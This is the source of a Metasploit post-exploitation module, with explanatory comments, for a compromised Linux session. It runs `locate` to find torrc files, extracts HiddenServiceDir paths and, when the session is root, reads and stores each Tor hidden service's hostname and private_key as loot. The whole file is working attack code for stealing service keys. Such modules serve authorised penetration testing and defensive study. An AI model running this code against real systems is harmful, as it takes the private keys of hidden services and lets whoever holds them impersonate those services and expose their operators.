GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/tor_hiddenservices.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Adapted from post/linux/gather/enum_configs.rb
##
# Post module for an already-established Linux session. It finds torrc files
# with `locate`, pulls the HiddenServiceDir entries out of them and, when the
# session is root, stores each service's `hostname` and `private_key` file as
# loot.
#
# Footprint on the host, as visible in this file: one `locate 'torrc'`
# pipeline, one `cat <torrc> | grep HiddenServiceDir ...` pipeline per torrc
# found, and reads of `hostname` / `private_key` under every listed directory.
# A copied private_key means the service identity should be treated as
# exposed.
class MetasploitModule < Msf::Post

  include Msf::Post::Linux::System
  include Msf::Post::Linux::Priv

  # Registers the module metadata (name, description, platform, session
  # types and stability notes) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info
  def initialize(info = {})
    metadata = {
      'Name' => 'Linux Gather TOR Hidden Services',
      'Description' => %q{
        This module collects the hostnames name and private keys of
        any TOR Hidden Services running on the target machine. It
        will search for torrc and if found, will parse it for the
        directories of Hidden Services. However, root permissions
        are required to read them as they are owned by the user that
        TOR runs as, usually a separate account.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Harvey Phillips <xcellerator[at]gmx.com>',
      ],
      'Platform' => ['linux'],
      'SessionTypes' => ['shell', 'meterpreter'],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, metadata))
  end

  # Entry point: prints the session's hostname plus the :version and :kernel
  # fields of get_sysinfo, then hands over to find_torrc.
  def run
    print_status("Running module against #{get_hostname} (#{session.session_host})")

    sysinfo = get_sysinfo
    print_status('Info:')
    [:version, :kernel].each { |field| print_status("\t#{sysinfo[field]}") }
    print_status('Looking for torrc...')
    find_torrc
  end

  # Stores +data+ as loot and reports where it was written.
  #
  # @param file [String] path whose basename becomes the loot file name
  # @param data [String] content to store
  # @param ltype [String] loot type label
  # @param ctype [String] content type, 'text/plain' unless given
  def save(file, data, ltype, ctype = 'text/plain')
    loot_name = ::File.basename(file)
    stored_at = store_loot(ltype, ctype, session, data, loot_name)
    print_status("#{loot_name} stored in #{stored_at}")
  end

  # Locates torrc files, collects their HiddenServiceDir values and, for a
  # root session, saves the hostname and private_key file of each directory.
  #
  # Stops early (after printing why) when no torrc is found, when no
  # HiddenServiceDir entry is found, or when the session is not root. Fails
  # the module with Failure::BadConfig if `locate` is not available.
  def find_torrc
    unless command_exists?('locate')
      fail_with(Failure::BadConfig, "'locate' command does not exist")
    end

    # The man page archive (torrc.5.gz) is filtered out of the locate results.
    torrc_paths = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
    if torrc_paths.empty?
      print_error('No torrc file found, maybe it goes by a different name?')
      return
    end

    # One list of directories across all torrc files, duplicates dropped.
    # `grep -v '#'` discards every line containing a '#', not only lines that
    # start with one.
    # NOTE(review): the torrc path is interpolated into the command unquoted.
    service_dirs = torrc_paths.flat_map do |torrc|
      print_good("Torrc file found at #{torrc}")
      cmd_exec("cat #{torrc} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
    end.uniq

    if service_dirs.empty?
      print_bad('No hidden services were found!')
      return
    end

    print_good("#{service_dirs.length} hidden services have been found!")

    unless is_root?
      print_error('Hidden Services were found, but we need root to access the directories')
      return
    end

    # File on disk => suffix used in the loot type. The file name is appended
    # to the directory string exactly as it appears in torrc; no separator is
    # inserted between them.
    wanted = { 'hostname' => 'hostname', 'private_key' => 'privatekey' }
    service_dirs.each do |dir|
      wanted.each do |file_name, loot_suffix|
        contents = read_file("#{dir}#{file_name}")
        # Skip nil results and shell error text returned in place of content.
        next if !contents || contents =~ /No such file or directory/

        save(dir, contents, "tor.#{dir.split('/')[-1]}.#{loot_suffix}")
      end
    end
  end
end